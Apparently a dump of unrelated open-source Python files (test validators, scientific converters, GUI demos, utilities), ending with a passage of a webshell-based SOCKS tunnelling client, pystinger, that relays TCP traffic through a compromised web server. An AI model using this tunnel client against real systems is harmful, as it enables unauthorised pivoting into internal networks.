logs_for_model = logs_for_iteration[0].split(
"config search for model:")[1:]
expected_step_counts = []
for model_log in logs_for_model:
expected_step_counts.append(model_log.count('[Search Step]'))
for i in range(1, 4):
logs_for_model = logs_for_iteration[i].split(
"config search for model:")[1:]
for j, model_log in enumerate(logs_for_model):
actual_step_count = model_log.count('[Search Step]')
if abs(actual_step_count - expected_step_counts[j]) > 1:
print("\n***\n*** Expected number of search steps for "
f"{self._models[j]} : {expected_step_counts[j]}."
f"Took {actual_step_count}. \n***")
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f',
'--config-file',
type=str,
required=True,
help='The path to the config yaml file.')
parser.add_argument('-l',
'--analyzer-log-file',
type=str,
required=True,
help='The full path to the analyzer log.')
parser.add_argument('-t',
'--test-name',
type=str,
required=True,
help='The name of the test to be run.')
args = parser.parse_args()
with open(args.config_file, 'r') as f:
config = yaml.safe_load(f)
TestOutputValidator(config, args.test_name, args.analyzer_log_file)
|
custom_components/bhyve/util.py | jdreamerz/bhyve-home-assistant | 122 | 12776468 | from homeassistant.util import dt
def orbit_time_to_local_time(timestamp: str):
if timestamp is not None:
return dt.as_local(dt.parse_datetime(timestamp))
return None
def anonymize(device):
device["address"] = "REDACTED"
device["full_location"] = "REDACTED"
device["location"] = "REDACTED"
return device
|
cx_Freeze/initscripts/SharedLib.py | TechnicalPirate/cx_Freeze | 358 | 12776474 | """
Initialization script for cx_Freeze which behaves similarly to the one for
console based applications but must handle the case where Python has already
been initialized and another DLL of this kind has been loaded. As such it
does not block the path unless sys.frozen is not already set.
"""
import sys
if not hasattr(sys, "frozen"):
sys.frozen = True
sys.path = sys.path[:4]
def run():
pass
|
python_solutions/chapter_08_recursion_and_dynamic_programming/problem_08_08_permutations_with_dups.py | isayapin/cracking-the-coding-interview | 560 | 12776494 | def permutations_with_dups(string):
hash_table = {}
permutations = []
for character in string:
if character in hash_table:
hash_table[character] += 1
else:
hash_table[character] = 1
helper('', hash_table, permutations)
return permutations
def helper(string, hash_table, permutations):
if sum(hash_table.values()) <= 0:
permutations.append(string)
else:
for character in hash_table:
local_hash_table = hash_table.copy()
if local_hash_table[character] <= 1:
local_hash_table.pop(character, None)
else:
local_hash_table[character] -= 1
helper(string + character, local_hash_table, permutations)
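# Usage sketch (hedged, not part of the original file): the character-count hash
# table prevents duplicate permutations from being generated, e.g.
#
#   permutations_with_dups('aab')   # -> ['aab', 'aba', 'baa'] (ordering may vary)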
|
bin/commands/corpus.py | davidmcclure/open-syllabus-project | 220 | 12776520 |
import os
import click
import csv
import random
import sys
from osp.common import config
from osp.common.utils import query_bar
from osp.corpus.corpus import Corpus
from osp.corpus.models import Document
from osp.corpus.models import Document_Format
from osp.corpus.models import Document_Text
from osp.corpus.jobs import ext_format
from osp.corpus.jobs import ext_text
from peewee import create_model_tables
from prettytable import PrettyTable
@click.group()
def cli():
pass
@cli.command()
def init_db():
"""
Create the database tables.
"""
create_model_tables([
Document,
Document_Format,
Document_Text
], fail_silently=True)
@cli.command()
def insert_documents():
"""
Insert documents in the database.
"""
Document.insert_documents()
@cli.command()
def queue_format():
"""
Queue format extraction tasks in the worker.
"""
for doc in query_bar(Document.select()):
config.rq.enqueue(ext_format, doc.id)
@cli.command()
def queue_text():
"""
Queue text extraction tasks in the worker.
"""
for doc in query_bar(Document.select()):
config.rq.enqueue(ext_text, doc.id)
@cli.command()
def format_counts():
"""
Print a table of file format -> count.
"""
t = PrettyTable(['File Type', 'Doc Count'])
t.align = 'l'
for c in Document_Format.format_counts():
t.add_row(c)
click.echo(t)
@cli.command()
def file_count():
"""
Print the total number of files.
"""
corpus = Corpus.from_env()
click.echo(corpus.file_count)
|
pysph/tools/pysph_to_vtk.py | nauaneed/pysph | 293 | 12776522 | <reponame>nauaneed/pysph
''' convert pysph .npz output to vtk file format '''
from __future__ import print_function
import os
import re
from enthought.tvtk.api import tvtk, write_data
from numpy import array, c_, ravel, load, zeros_like
def write_vtk(data, filename, scalars=None, vectors={'V':('u','v','w')}, tensors={},
coords=('x','y','z'), dims=None, **kwargs):
    ''' write data into a vtk file
Parameters
----------
data : dict
mapping of variable name to their numpy array
filename : str
the file to write to (can be any recognized vtk extension)
if extension is missing .vts extension is appended
scalars : list
list of arrays to write as scalars (defaults to data.keys())
vectors : dict
mapping of vector name to vector component names to take from data
tensors : dict
mapping of tensor name to tensor component names to take from data
coords : list
the name of coordinate data arrays (default=('x','y','z'))
dims : 3 tuple
the size along the dimensions for (None means x.shape)
**kwargs : extra arguments for the file writer
example file_type=binary/ascii
'''
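    # Illustrative call (a hedged sketch; the array names 'u', 'v', 'w', 'p' are
    # assumptions chosen for this example, not taken from any PySPH output):
    #
    #   import numpy as np
    #   x, y = np.mgrid[0:1:10j, 0:1:10j]
    #   data = {'x': x, 'y': y, 'u': np.sin(x), 'v': np.cos(y), 'w': 0*x, 'p': x + y}
    #   write_vtk(data, 'fields.vts', scalars=['p'])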
x = data[coords[0]]
y = data.get(coords[1], zeros_like(x))
z = data.get(coords[2], zeros_like(x))
if dims is None:
dims = array([1,1,1])
dims[:x.ndim] = x.shape
else:
dims = array(dims)
sg = tvtk.StructuredGrid(points=c_[x.flat,y.flat,z.flat],dimensions=array(dims))
pd = tvtk.PointData()
if scalars is None:
scalars = [i for i in data.keys() if i not in coords]
for v in scalars:
pd.scalars = ravel(data[v])
pd.scalars.name = v
sg.point_data.add_array(pd.scalars)
for vec,vec_vars in vectors.items():
u,v,w = [data[i] for i in vec_vars]
pd.vectors = c_[ravel(u),ravel(v),ravel(w)]
pd.vectors.name = vec
sg.point_data.add_array(pd.vectors)
for ten,ten_vars in tensors.items():
vars = [data[i] for i in ten_vars]
tensors = c_[[ravel(i) for i in vars]].T
pd.tensors = tensors
pd.tensors.name = ten
sg.point_data.add_array(pd.tensors)
write_data(sg, filename, **kwargs)
def detect_vectors_tensors(keys):
''' detect the vectors and tensors from given array names
Vectors are identified as the arrays with common prefix followed by
0,1 and 2 in their names
Tensors are identified as the arrays with common prefix followed by
two character codes representing ij indices
(00,01,02,11,12,22) for a symmetric tensor
(00,01,02,10,11,12,20,21,22) for a tensor
Arrays not belonging to vectors or tensors are returned as scalars
Returns scalars,vectors,tensors in a format suitable to be used as arguments
for :py:func:`write_vtk`
'''
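    # Worked example (illustrative names only): for
    #   keys = ['x0', 'x1', 'x2', 'rho', 'S00', 'S01', 'S02', 'S11', 'S12', 'S22']
    # this returns roughly
    #   scalars = ['rho']
    #   vectors = {'x': ['x0', 'x1', 'x2']}
    #   tensors = {'S': [the six symmetric 'Sij' names expanded to a full 3x3 list]}
    # Note that keys shorter than two characters are skipped by the length grouping below.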
d = {}
for k in keys:
d[len(k)] = d.get(len(k), [])
d[len(k)].append(k)
scalars = []
vectors = {}
tensors = {}
for n,l in d.items():
if n<2:
continue
l.sort()
idx = -1
while idx<len(l)-1:
idx += 1
k = l[idx]
# check if last char is 0
if k[-1] == '0':
# check for tensor
if k[-2] == '0':
# check for 9 tensor
ten = []
for i in range(3):
for j in range(3):
ten.append(k[:-2]+str(j)+str(i))
ten.sort()
if l[idx:idx+9] == ten:
tensors[k[:-2]] = ten
idx += 8
continue
# check for symm 6 tensor
ten2 = []
for i in range(3):
for j in range(i+1):
ten2.append(k[:-2]+str(j)+str(i))
ten2.sort()
if l[idx:idx+6] == ten2:
ten = []
for i in range(3):
for j in range(3):
ten.append(k[:-2]+str(min(i,j))+str(max(i,j)))
tensors[k[:-2]] = ten
idx += 5
continue
# check for vector
vec = []
for i in range(3):
vec.append(k[:-1] + str(i))
if l[idx:idx+3] == vec:
vectors[k[:-1]] = vec
idx += 2
continue
scalars.append(k)
return scalars, vectors, tensors
def get_output_details(path):
solvers = {}
if not os.path.isdir(path):
path = os.path.dirname(path)
files = os.listdir(path)
files.sort()
pat = re.compile(r'(?P<solver>.+)_(?P<rank>\d+)_(?P<entity>.+)_(?P<time>[-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?).npz')
matches = [(f,pat.match(f)) for f in files]
files = []
for filename,match in matches:
if match is None:
continue
files.append(filename)
groups = match.groupdict()
solvername = groups['solver']
solver = solvers.get(solvername)
if solver is None:
solver = [set([]),set([]),set([])]
solvers[solvername] = solver
solver[0].add(groups['rank'])
solver[1].add(groups['entity'])
solver[2].add(groups['time'])
# {solver:(entities,procs,times)}
return solvers
def pysph_to_vtk(path, merge_procs=False, skip_existing=True, binary=True):
''' convert pysph output .npz files into vtk format
Parameters
----------
path : str
directory where .npz files are located
merge_procs : bool
whether to merge the data from different procs into a single file
(not yet implemented)
skip_existing : bool
skip files where corresponding vtk already exist
this is useful if you've converted vtk files while a solver is running
only want to convert the newly added files
binary : bool
whether to use binary format in vtk file
The output vtk files are stored in a directory `solver_name` _vtk within
the `path` directory
'''
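    # Minimal invocation sketch (the path below is an assumption):
    #
    #   pysph_to_vtk('path/to/solver_output', skip_existing=False, binary=True)
    #
    # which writes one VTK file per saved timestep into a '<solver>_vtk' directory
    # next to the .npz files, plus a 'times' file mapping frame index to solver time.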
if binary:
data_mode = 'binary'
else:
data_mode = 'ascii'
if merge_procs is True:
# FIXME: implement
raise NotImplementedError('merge_procs=True not implemented yet')
solvers = get_output_details(path)
for solver, (procs, entities, times) in solvers.items():
print('converting solver:', solver)
dir = os.path.join(path,solver+'_vtk')
if not os.path.exists(dir):
os.mkdir(dir)
procs = sorted(procs)
entities = sorted(entities)
times = sorted(times, key=float)
times_file = open(os.path.join(dir,'times'), 'w')
for entity in entities:
print(' entity:', entity)
for proc in procs:
print(' proc:', proc)
print(' timesteps:', len(times))
f = '%s_%s_%s_'%(solver,proc,entity)
of = os.path.join(dir,f)
for i, time in enumerate(times):
print('\r',i,)
if skip_existing and os.path.exists(f+str(i)):
continue
d = load(os.path.join(path, f+time+'.npz'))
arrs = {}
for nam,val in d.items():
if val.ndim > 0:
arrs[nam] = val
d.close()
scalars, vectors, tensors = detect_vectors_tensors(arrs)
vectors['V'] = ['u','v','w']
z = zeros_like(arrs['x'])
if 'v' not in arrs:
arrs['v'] = z
if 'w' not in arrs:
arrs['w'] = z
write_vtk(arrs, of+str(i),
scalars=scalars, vectors=vectors, tensors=tensors,
data_mode=data_mode)
times_file.write('%d\t%s\n'%(i,time))
times_file.close()
def extract_text(path, particle_idx, props=['x','y','u','v','p','rho','sigma00','sigma01','sigma11'], ent=None, solvers=None):
if solvers:
raise NotImplementedError
else:
solvers = get_output_details(path)
for solver, (procs, entities, times) in solvers.items():
print('converting solver:', solver)
dir = os.path.join(path,solver+'_vtk')
if not os.path.exists(dir):
os.mkdir(dir)
procs = sorted(procs)
entities = sorted(entities)
times = sorted(times, key=float)
times_file = open(os.path.join(dir,'times'), 'w')
e = ent
if ent is None:
e = entities
for entity in entities:
if entity not in e:
continue
print(' entity:', entity)
for proc in procs:
print(' proc:', proc)
print(' timesteps:', len(times))
f = '%s_%s_%s_'%(solver,proc,entity)
of = os.path.join(dir,f)
files = [open(os.path.join(path,f+'%d.dat'%particle_id), 'w') for particle_id in particle_idx]
print(files)
for file in files:
file.write('i\tt\t'+'\t'.join(props))
for i, time in enumerate(times):
print('\r',i,)
d = load(os.path.join(path, f+time+'.npz'))
s = '\n%d\t%s'%(i,time)
for j,file in enumerate(files):
file.write(s)
for prop in props:
file.write('\t')
file.write(str(d[prop][particle_idx[j]]))
d.close()
for file in files:
file.close()
def test():
l = ['x'+str(i) for i in range(3)]
l.append('a0')
l.append('a1')
for i in range(3):
for j in range(3):
if i == j:
l.append('XX%d'%i)
if i <= j:
l.append('S%d%d'%(i,j))
l.append('T%d%d'%(i,j))
scalars, vectors, tensors = detect_vectors_tensors(l)
assert set(scalars) == set(['a0','a1'])
assert set(vectors) == set(['x','XX'])
assert set(tensors) == set(['S','T'])
if __name__ == '__main__':
import sys
pysph_to_vtk(path=sys.argv[1])
|
brml/multpots.py | herupraptono/pybrml | 136 | 12776553 | <reponame>herupraptono/pybrml
#!/usr/bin/env python
"""
MULTPOTS Multiply potentials into a single potential
newpot = multpots(pots)
multiply potentials : pots is a cell of potentials
potentials with empty tables are ignored
if a table of type 'zero' is encountered, the result is a table of type
'zero' with table 0, and empty variables.
"""
def multpots(pots):
# import copy
newpot = pots[0]
for i in range(1, len(pots)): # loop over all the potentials
#FIX ME: did not check dimension consistency
newpot = newpot*pots[i]
return newpot
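# Usage sketch (hedged): each element of `pots` is assumed to be a brml potential
# object whose `*` operator multiplies potential tables, e.g.
#
#   joint = multpots([pot_a, pot_b, pot_c])   # equivalent to pot_a * pot_b * pot_c
#
# `pot_a`, `pot_b` and `pot_c` are placeholder names, not objects defined in this module.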
|
Chapter06/Ch6/demo/indexing.py | henrryyanez/Tkinter-GUI-Programming-by-Example | 127 | 12776563 | import tkinter as tk
win = tk.Tk()
current_index = tk.StringVar()
text = tk.Text(win, bg="white", fg="black")
lab = tk.Label(win, textvar=current_index)
def update_index(event=None):
cursor_position = text.index(tk.INSERT)
cursor_position_pieces = str(cursor_position).split('.')
cursor_line = cursor_position_pieces[0]
cursor_char = cursor_position_pieces[1]
current_index.set('line: ' + cursor_line + ' char: ' + cursor_char + ' index: ' + str(cursor_position))
text.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
lab.pack(side=tk.BOTTOM, fill=tk.X, expand=1)
text.bind('<KeyRelease>', update_index)
win.mainloop()
|
python/234_Palindrome_Linked_List.py | dvlpsh/leetcode-1 | 4,416 | 12776583 | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
# def __init__(self):
# self.curr_head = None
#
# def isPalindrome(self, head):
# """
# :type head: ListNode
# :rtype: bool
# """
# self.curr_head = head
# return self.check(head)
#
# def check(self, node):
# if node is None:
# return True
# isPal = self.check(node.next) and (self.curr_head.val == node.val)
# self.curr_head = self.curr_head.next
# return isPal
def isPalindrome(self, head):
# p2 is 2 times faster than p3
# p1 and pre is used to reverse the first half of the list
# so when the first while is over
# p1 is in the middle
# p3 is in middle + 1
# p2 is in the end
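        # Worked example (added for illustration): for 1->2->3->2->1 the first loop
        # reverses the first half in place; afterwards p1 sits on the middle node 3,
        # p3 on the second '2' and p2 on the tail. Because the length is odd,
        # p1 is advanced once more (p1 = p1.next), so both pointers then walk 2 -> 1
        # and every comparison matches, returning True.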
if head is None:
return True
p1, p2 = head, head
p3, pre = p1.next, p1
while p2.next is not None and p2.next.next is not None:
p2 = p2.next.next
pre = p1
p1 = p3
p3 = p3.next
p1.next = pre
if p2.next is None:
p1 = p1.next
while p3 is not None:
if p1.val != p3.val:
return False
p1 = p1.next
p3 = p3.next
return True |
inst/python/rpytools/help.py | flyaflya/reticulate | 1,476 | 12776592 |
import sys
import types
import inspect
def isstring(s):
# if we use Python 3
if (sys.version_info[0] >= 3):
return isinstance(s, str)
# we use Python 2
return isinstance(s, basestring)
def normalize_func(func):
# return None for builtins
if (inspect.isbuiltin(func)):
return None
return func
def get_doc(func):
doc = inspect.getdoc(func)
if doc is None:
func = normalize_func(func)
if func is None:
return None
else:
doc = inspect.getdoc(func)
return doc
def get_property_doc(target, prop):
for name, obj in inspect.getmembers(type(target), inspect.isdatadescriptor):
if (isinstance(obj, property) and name == prop):
return inspect.getdoc(obj.fget)
return None
def get_argspec(func):
try:
if sys.version_info[0] >= 3:
return inspect.getfullargspec(func)
else:
return inspect.getargspec(func)
except TypeError:
return None
def get_arguments(func):
func = normalize_func(func)
if func is None:
return None
argspec = get_argspec(func)
if argspec is None:
return None
args = argspec.args
if 'self' in args:
args.remove('self')
return args
def get_r_representation(default):
if callable(default) and hasattr(default, '__name__'):
arg_value = default.__name__
else:
if default is None:
arg_value = "NULL"
elif type(default) == type(True):
if default == True:
arg_value = "TRUE"
else:
arg_value = "FALSE"
elif isstring(default):
arg_value = "\"%s\"" % default
elif isinstance(default, int):
arg_value = "%rL" % default
elif isinstance(default, float):
arg_value = "%r" % default
elif isinstance(default, list):
arg_value = "c("
for i, item in enumerate(default):
if i is (len(default) - 1):
arg_value += "%s)" % get_r_representation(item)
else:
arg_value += "%s, " % get_r_representation(item)
elif isinstance(default, (tuple, set)):
arg_value = "list("
for i, item in enumerate(default):
if i is (len(default) - 1):
arg_value += "%s)" % get_r_representation(item)
else:
arg_value += "%s, " % get_r_representation(item)
elif isinstance(default, dict):
arg_value = "list("
for i in range(len(default)):
i_arg_value = "%s = %s" % \
(default.keys()[i], get_r_representation(default.values()[i]))
if i is (len(default) - 1):
arg_value += "%s)" % i_arg_value
else:
arg_value += "%s, " % i_arg_value
else:
arg_value = "%r" % default
# if the value starts with "tf." then convert to $ usage
if (arg_value.startswith("tf.")):
arg_value = arg_value.replace(".", "$")
return(arg_value)
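# A few illustrative mappings (hedged, not exhaustive):
#   get_r_representation(True)     -> "TRUE"
#   get_r_representation([1, 2])   -> "c(1L, 2L)"
#   get_r_representation("alpha")  -> "\"alpha\""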
def generate_signature_for_function(func):
"""Given a function, returns a string representing its args."""
func = normalize_func(func)
if func is None:
return None
args_list = []
argspec = get_argspec(func)
if argspec is None:
return None
first_arg_with_default = (
len(argspec.args or []) - len(argspec.defaults or []))
for arg in argspec.args[:first_arg_with_default]:
if arg == "self":
# Python documentation typically skips `self` when printing method
# signatures.
continue
args_list.append(arg)
if argspec.varargs == "args" and hasattr(argspec, 'keywords') and argspec.keywords == "kwds":
original_func = func.__closure__[0].cell_contents
return generate_signature_for_function(original_func)
if argspec.defaults:
for arg, default in zip(
argspec.args[first_arg_with_default:], argspec.defaults):
arg_value = get_r_representation(default)
args_list.append("%s = %s" % (arg, arg_value))
if argspec.varargs:
args_list.append("...")
if hasattr(argspec, 'keywords') and argspec.keywords:
args_list.append("...")
return "(" + ", ".join(args_list) + ")"
|
bibliopixel/commands/devices.py | rec/leds | 253 | 12776594 | <reponame>rec/leds
"""
Find serial devices and update serial device IDs
"""
from .. util import log
CONNECT_MESSAGE = """
Connect just one Serial device (AllPixel) and press enter..."""
def run(args):
from ..drivers.serial.driver import Serial
from ..drivers.serial.devices import Devices
import serial
run = True
log.printer("Press Ctrl+C any time to exit.")
try:
while run:
try:
input(CONNECT_MESSAGE)
devices = Devices(args.hardware_id, args.baud)
ports = devices.find_serial_devices()
if not ports:
log.printer("No serial devices found. Please connect one.")
continue
port = sorted(ports.items())[0][1][0]
id = devices.get_device_id(port)
log.printer("Device ID of {}: {}".format(port, id))
newID = input("Input new ID (enter to skip): ")
if newID != '':
try:
newID = int(newID)
if newID < 0 or newID > 255:
raise ValueError()
devices.set_device_id(port, newID)
id = devices.get_device_id(port)
log.printer("Device ID set to: %s" % id)
except ValueError:
log.printer("Please enter a number between 0 and 255.")
except serial.SerialException as e:
log.printer("Problem connecting to serial device. %s" % e)
except Exception as e:
log.printer('Programmer error with exception %s' % e)
except KeyboardInterrupt:
pass
def add_arguments(parser):
parser.set_defaults(run=run)
parser.add_argument('--hardware-id', default='1D50:60AB',
help='USB Vendor ID : Product ID of device. '
'Defaults to VID:PID for AllPixel')
parser.add_argument('--baud', default=921600, type=int,
help='Serial baud rate.')
|
chapter13/asyncgmaps.py | lixin940207/expert_python_programming | 189 | 12776622 | <reponame>lixin940207/expert_python_programming<gh_stars>100-1000
# -*- coding: utf-8 -*-
import aiohttp
session = aiohttp.ClientSession()
async def geocode(place):
params = {
'sensor': 'false',
'address': place
}
async with session.get(
'https://maps.googleapis.com/maps/api/geocode/json',
params=params
) as response:
result = await response.json()
return result['results']
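# Usage sketch (hedged; assumes a running event loop and that the geocoding endpoint
# accepts the request without an API key, which may not hold in practice):
#
#   import asyncio
#   results = asyncio.get_event_loop().run_until_complete(geocode('Warsaw'))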
|
stinger_client.py | wisdark/pystinger | 973 | 12776649 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# @File : client.py
# @Date : 2019/8/28
# @Desc :
# @license : Copyright(C), funnywolf
# @Author: funnywolf
# @Contact : github.com/FunnyWolf
import argparse
import struct
import threading
import time
from socket import AF_INET, SOCK_STREAM
from threading import Thread
import ipaddr
from config import *
try:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
except Exception as E:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
global globalClientCenter
class ClientCenter(threading.Thread):
def __init__(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
"Connection": "keep-alive",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8",
'Accept-Encoding': 'gzip',
}
self.proxy = None
self.CACHE_CONNS = {}
self.MIRROR_CHCHE_CONNS = {}
# {
# "conn": self.request,
# "targetaddr": TARGET_ADDR,
# "new": True,
# }
        # socket parameters
self.LOCAL_ADDR = None
self.READ_BUFF_SIZE = 11200
        self.POST_RETRY_COUNT = 10  # maximum number of retries for POST requests
        # logging parameters
self.LOG_LEVEL = "INFO"
self.logger = get_logger(level=self.LOG_LEVEL, name="StreamLogger")
        # webshell parameters
self.WEBSHELL = None
self.REMOTE_SERVER = None
self.SINGLE_MODE = False
# mirror
self.SOCKET_TIMEOUT = DEFAULT_SOCKET_TIMEOUT
self.TARGET_IP = "127.0.0.1"
self.TARGET_PORT = 60020
        # cache variables
self.die_client_address = []
self.mirror_die_client_address = []
self.session = requests.session()
self.session.verify = False
        # multithreading variables
self.post_send_data = {}
self.post_return_data = {}
threading.Thread.__init__(self)
def custom_header(self, inputstr):
try:
str_headers = inputstr.split(",")
for str_header in str_headers:
header_type = str_header.split(":")[0].strip()
header_value = str_header.split(":")[1].strip()
self.headers[header_type] = header_value
except Exception as E:
self.logger.exception(E)
return False
self.logger.info("------------ Custom Http Request Header ------------")
self.logger.info(self.headers)
self.logger.info("\n")
return True
def custom_proxy(self, proxy):
self.proxy = {'http': proxy, 'https': proxy}
self.session.proxies = self.proxy
self.logger.info("------------ Custom Http Request Proxy ------------")
self.logger.info(self.proxy)
self.logger.info("\n")
return True
def recv_socks_data(self, client_address):
"""socks数据接收"""
client_socket_conn = self.CACHE_CONNS.get(client_address).get("conn")
try:
tcp_recv_data = client_socket_conn.recv(self.READ_BUFF_SIZE)
self.logger.debug("CLIENT_ADDRESS:{} TCP_RECV_DATA:{}".format(client_address, tcp_recv_data))
if len(tcp_recv_data) > 0:
has_data = True
self.logger.info("CLIENT_ADDRESS:{} TCP_RECV_LEN:{}".format(client_address, len(tcp_recv_data)))
except Exception as err:
tcp_recv_data = b""
self.logger.debug("TCP_RECV_NONE")
        # due to encoding issues, the raw TCP payload needs an extra base64 encoding
client_socket_targetaddr = self.CACHE_CONNS.get(client_address).get("targetaddr")
        # data structure for each client_address
client_address_one_data = {
"data": base64.b64encode(tcp_recv_data),
"targetaddr": client_socket_targetaddr,
}
self.post_send_data[client_address] = client_address_one_data
def send_socks_data(self, client_address):
        # send the data returned by the server into the client TCP connection
        # read the data returned by the server
try:
client_socket_conn = self.CACHE_CONNS.get(client_address).get("conn")
server_tcp_send_data = base64.b64decode(self.post_return_data.get(client_address).get("data"))
except Exception as E:
if self.SINGLE_MODE is True:
self.logger.warning(
"CLIENT_ADDRESS:{} server socket not in client socket list".format(client_address))
self.logger.warning("SINGLE_MODE: {} ,remove is conn from server".format(self.SINGLE_MODE))
self.die_client_address.append(client_address)
return
        if server_tcp_send_data == "":  # no data returned, continue with the next connection
return
        # send the returned data into the client TCP connection
try:
client_socket_conn.send(server_tcp_send_data)
self.logger.debug("CLIENT_ADDRESS:{} TCP_SEND_DATA:{}".format(client_address, server_tcp_send_data))
except Exception as E:
self.logger.warning("CLIENT_ADDRESS:{} Client socket send failed".format(client_address))
self.die_client_address.append(client_address)
try:
self.CACHE_CONNS.pop(client_address)
client_socket_conn.close()
except Exception as E:
pass
def _post_data(self, url, data={}):
"""发送数据到webshell"""
payload = {
"Remoteserver": self.REMOTE_SERVER,
"Endpoint": url,
"SENDDATA": diyEncode(data)
}
self.logger.debug(payload)
for i in range(self.POST_RETRY_COUNT):
try:
                # timeout must be larger than the post timeout used in the server-side script
r = self.session.post(self.WEBSHELL, data=payload, verify=False, timeout=15, headers=self.headers)
except Exception as E:
self.logger.warning("Post data to WEBSHELL failed")
self.logger.exception(E)
                time.sleep(3)  # back off after an error
continue
try:
web_return_data = diyDecode(r.content)
if isinstance(web_return_data, dict) and web_return_data.get(ERROR_CODE) is not None:
self.logger.error(web_return_data.get(ERROR_CODE))
self.logger.warning(r.content)
return None
else:
return web_return_data
except Exception as E:
self.logger.warning("WEBSHELL return wrong data")
self.logger.debug(r.content)
                time.sleep(3)  # back off after an error
continue
        # give up after exceeding the retry count
return None
def run(self):
self.logger.warning("LoopThread start")
while True:
self._sync_data()
def _sync_data(self):
has_data = False
        # clean up dead clients
for client_address in self.die_client_address:
try:
one = self.CACHE_CONNS.pop(client_address)
one.get("conn").close()
self.logger.warning("CLIENT_ADDRESS:{} close client in die_client_address".format(client_address))
except Exception as E:
self.logger.warning(
"CLIENT_ADDRESS:{} close client close client in die_client_address error".format(client_address))
        # read data from the client TCP connections
thread_list = []
self.post_send_data = {}
for client_address in list(self.CACHE_CONNS.keys()):
temp = Thread(target=self.recv_socks_data,
args=(client_address,))
thread_list.append(temp)
for temp in thread_list:
temp.start()
for temp in thread_list:
temp.join()
        # read data from the client TCP connections (mirror)
mirror_post_send_data = {}
for mirror_client_address in list(self.MIRROR_CHCHE_CONNS.keys()):
client_socket_conn = self.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
try:
tcp_recv_data = client_socket_conn.recv(self.READ_BUFF_SIZE)
self.logger.debug("CLIENT_ADDRESS:{} TCP_RECV_DATA:{}".format(mirror_client_address, tcp_recv_data))
if len(tcp_recv_data) > 0:
has_data = True
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} CLIENT_TCP_RECV_LEN:{}".format(mirror_client_address,
len(tcp_recv_data)))
except Exception as err:
tcp_recv_data = b""
self.logger.debug("TCP_RECV_NONE")
            # data structure for each client_address
client_address_one_data = {
                # due to encoding issues, the raw TCP payload needs an extra base64 encoding
"data": base64.b64encode(tcp_recv_data),
}
mirror_post_send_data[mirror_client_address] = client_address_one_data
        # assemble the payload
        payload = {}
        payload[DATA_TAG] = self.post_send_data  # data to send
        payload[DIE_CLIENT_ADDRESS_TAG] = self.die_client_address  # connections to clean up
        payload[MIRROR_DATA_TAG] = mirror_post_send_data  # mirror data to send
        payload[MIRROR_DIE_CLIENT_ADDRESS_TAG] = self.mirror_die_client_address  # mirror connections to clean up
        # send the collected data to the webshell
return_data = self._post_data(URL_STINGER_SYNC, data=payload)
        if return_data is None:  # failed to fetch data, abort this sync round
return
        # process the POST response
        # read the data returned by the server
self.post_return_data = return_data.get(RETURN_DATA)
self.die_client_address = []
thread_list = []
for client_address in list(self.post_return_data.keys()):
temp = Thread(target=self.send_socks_data,
args=(client_address,))
thread_list.append(temp)
for temp in thread_list:
temp.start()
for temp in thread_list:
temp.join()
        # check for clients missing from the server's return list
for client_address in list(self.CACHE_CONNS.keys()):
if self.post_return_data.get(client_address) is None:
if self.CACHE_CONNS.get(client_address).get("new") is True:
self.CACHE_CONNS[client_address]["new"] = False
pass
else:
self.logger.warning(
"CLIENT_ADDRESS:{} remove client not in server CHCHE_CONNS".format(client_address)
)
self.logger.warning("CLIENT_ADDRESS:{} append in die_client_address".format(client_address))
self.die_client_address.append(client_address)
        # mirror handling
mirror_post_return_data = return_data.get(MIRROR_RETURN_DATA)
self.mirror_die_client_address = []
for mirror_client_address in list(mirror_post_return_data.keys()):
            # handle the socket connection
if self.MIRROR_CHCHE_CONNS.get(mirror_client_address) is None:
                # create a new connection
try:
server_socket_conn = socket.socket(AF_INET, SOCK_STREAM)
server_socket_conn.settimeout(self.SOCKET_TIMEOUT)
                    server_socket_conn.connect((self.TARGET_IP, self.TARGET_PORT), )  # json does not support tuples; converted to a list automatically
self.MIRROR_CHCHE_CONNS[mirror_client_address] = {"conn": server_socket_conn}
self.logger.info("MIRROR_CLIENT_ADDRESS:{} Create new tcp socket, TARGET_ADDRESS:{}:{}".format(
mirror_client_address, self.TARGET_IP, self.TARGET_PORT))
except Exception as E:
self.logger.warning(
"MIRROR_CLIENT_ADDRESS:{} TARGET_ADDR:{}:{} Create new socket failed. {}".format(
mirror_client_address,
self.TARGET_IP,
self.TARGET_PORT, E))
self.mirror_die_client_address.append(mirror_client_address)
continue
else:
server_socket_conn = self.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
            # read the data returned by the server
try:
server_tcp_send_data = base64.b64decode(mirror_post_return_data.get(mirror_client_address).get("data"))
server_socket_conn.send(server_tcp_send_data)
self.logger.debug("MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_SEND_DATA:{}".format(mirror_client_address,
server_tcp_send_data))
if len(server_tcp_send_data) > 0:
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_SEND_LEN:{}".format(mirror_client_address,
len(server_tcp_send_data)))
except Exception as E:
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} socket send data failed. {}".format(mirror_client_address, E))
self.mirror_die_client_address.append(mirror_client_address)
one = self.MIRROR_CHCHE_CONNS.pop(mirror_client_address)
one.get("conn").close()
continue
        # check for clients missing from the server's return list
for mirror_client_address in list(self.MIRROR_CHCHE_CONNS.keys()):
if mirror_post_return_data.get(mirror_client_address) is None:
self.logger.warning(
"MIRROR_CLIENT_ADDRESS:{} remove client not in server MIRROR_CHCHE_CONNS".format(
mirror_client_address)
)
# self.mirror_die_client_address.append(mirror_client_address)
one = self.MIRROR_CHCHE_CONNS.pop(mirror_client_address)
one.get("conn").close()
        # wait interval
if has_data:
wait = 0
else:
